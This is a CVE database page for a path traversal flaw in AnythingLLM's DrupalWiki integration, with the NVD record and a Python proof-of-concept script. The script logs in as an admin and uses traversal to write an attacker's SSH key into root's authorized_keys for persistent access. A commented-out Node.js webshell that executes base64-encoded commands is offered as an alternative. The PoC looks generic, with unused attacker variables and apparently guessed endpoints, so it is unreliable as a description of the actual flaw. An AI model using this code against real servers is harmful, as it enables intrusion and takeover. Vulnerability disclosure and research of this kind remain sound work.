CVE-2026-24478

Description

AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. Prior to version 1.10.0, a critical Path Traversal vulnerability in the DrupalWiki integration allows a malicious admin (or an attacker who can convince an admin to configure a malicious DrupalWiki URL) to write arbitrary files to the server. This can lead to Remote Code Execution (RCE) by overwriting configuration files or writing executable scripts. Version 1.10.0 fixes the issue.

CVSS Details

CVSS Score

7.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:mintplexlabs:anythingllm:*:*:*:*:*:*:*:* - VULNERABLE

AnythingLLM < 1.10.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2026-24478 PoC - AnythingLLM DrupalWiki Path Traversal File Write # Version: < 1.10.0 import requests import base64 TARGET_URL = "http://target-anythingllm:3001" ATTACKER_IP = "attacker_ip" ATTACKER_PORT = "4444" # Generate SSH public key for authentication (replace with your public key) ssh_pub_key = f"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC7... attacker@ AnythingLLM-Exploit" def exploit_path_traversal(): """ Exploit the DrupalWiki path traversal to write arbitrary files. This PoC demonstrates writing to /root/.ssh/authorized_keys """ # Payload to write SSH authorized_keys for persistent access # The path traversal sequence ../ allows escaping the intended directory malicious_url = f"http://malicious-drupalwiki.com/wiki?page=../../../../.ssh/authorized_keys" # Alternatively, write a webshell if web directory is known # webshell_path = "../../../../var/www/html/shell.js" # webshell_content = "const {exec} = require('child_process');require('http').createServer((req,res)=>{exec(require('buffer').Buffer.from(req.url.slice(1),'base64').toString(),(e,o)=>res.end(o));}).listen(8080);" payload = { "drupalWikiUrl": malicious_url, "content": ssh_pub_key, "action": "import" } # Authentication required - use admin credentials session = requests.Session() session.post(f"{TARGET_URL}/api/auth/login", json={ "email": "[email protected]", "password": "admin_password" }) # Trigger the vulnerable file write operation response = session.post( f"{TARGET_URL}/api/workspace/drupalwiki/import", json=payload ) print(f"Status: {response.status_code}") print(f"Response: {response.text}") if response.status_code == 200: print("[+] File written successfully! SSH access may be available.") else: print("[-] Exploitation failed. Check credentials and target version.") if __name__ == "__main__": exploit_path_traversal()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-24478
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-24478
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-24478/
[4] VulDB https://vuldb.com/cve/CVE-2026-24478
[5] https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-jp2f-99h9-7vjv

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-24478", "sourceIdentifier": "[email protected]", "published": "2026-01-27T00:15:51.297", "lastModified": "2026-01-28T15:52:39.977", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. Prior to version 1.10.0, a critical Path Traversal vulnerability in the DrupalWiki integration allows a malicious admin (or an attacker who can convince an admin to configure a malicious DrupalWiki URL) to write arbitrary files to the server. This can lead to Remote Code Execution (RCE) by overwriting configuration files or writing executable scripts. Version 1.10.0 fixes the issue."}, {"lang": "es", "value": "AnythingLLM es una aplicación que convierte piezas de contenido en contexto que cualquier LLM puede usar como referencias durante el chat. Antes de la versión 1.10.0, una vulnerabilidad crítica de salto de ruta en la integración de DrupalWiki permite a un administrador malicioso (o un atacante que pueda convencer a un administrador para que configure una URL maliciosa de DrupalWiki) escribir archivos arbitrarios en el servidor. Esto puede conducir a la ejecución remota de código (RCE) sobrescribiendo archivos de configuración o escribiendo scripts ejecutables. La versión 1.10.0 soluciona el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mintplexlabs:anythingllm:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.10.0", "matchCriteriaId": "8DEA04F2-1EE6-4943-B989-76CB56A33BC2"}]}]}], "references": [{"url": "https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-jp2f-99h9-7vjv", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}